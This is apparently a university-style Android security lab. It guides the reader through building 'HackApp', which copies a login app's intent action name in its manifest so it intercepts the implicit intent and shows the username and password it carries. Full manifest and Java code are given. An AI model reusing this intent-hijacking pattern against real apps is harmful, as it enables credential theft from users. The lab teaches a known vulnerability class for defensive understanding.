Home
These labs are for educational purposes. Readers should perform gracefully based on hacking ethics and should not spread or utilize the code in these labs to harm other Android phone users to gain their own benefits. A more thorough specification of hacking ethics can be found here and here. Please read them carefully.
In this lab, we will use a malicious Android application (hackapp) to demonstrate intent security problem on Android platform. The malicious Android application should obtain the intent information from LoginApp if the Show Activity method has same action name and other characteristics as the LoginApp. The following figure gives the basic idea of this security problem.
Use the Android application developed in Part1 (LoginApp) to demonstrate how hackers can obtain the data sent in other applications (through “Activities” in Android)
Download the android project – “LoginApp” from here and import it in Android Studio.
a) In “Android Studio”, start a new project and name it HackApp
b) Choose “Gingerbread” API, preferably
c) Select an empty activity
a) In the Android view, navigate to 'app → res → layout'
b) Copy the following code in the activity_main.xml file:
<?xml version="1.0" encoding="utf-8"?>
<RelativeLayout
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context="com.example.hackapp.MainActivity">
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="Hello World!" />
</RelativeLayout> a) Copy the following code in the MainActivity.java file:
package com.example.hackapp;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle; import android.widget.Toast;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Bundle bun = getIntent().getExtras();
String result1 = bun.getString("Username");
String result2 = bun.getString("Password");
Toast.makeText(getBaseContext(), "username: "+result1+ "\npassword: "+result2, Toast.LENGTH_SHORT).show();
}
} b) Your project should look like this after creating the new java files:
a) Copy the following code in the AndroidManifest.xml file:
<?xml version="1.0" encoding="utf-8"?>
<manifest
xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.hackapp">
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/AppTheme">
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="com.example.loginapp.LoginActivity" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
</application>
</manifest> a) Run the LoginApp. Input the username and password and click Login. HackApp gets activated and pops up. Here is what is shown in the HackApp:
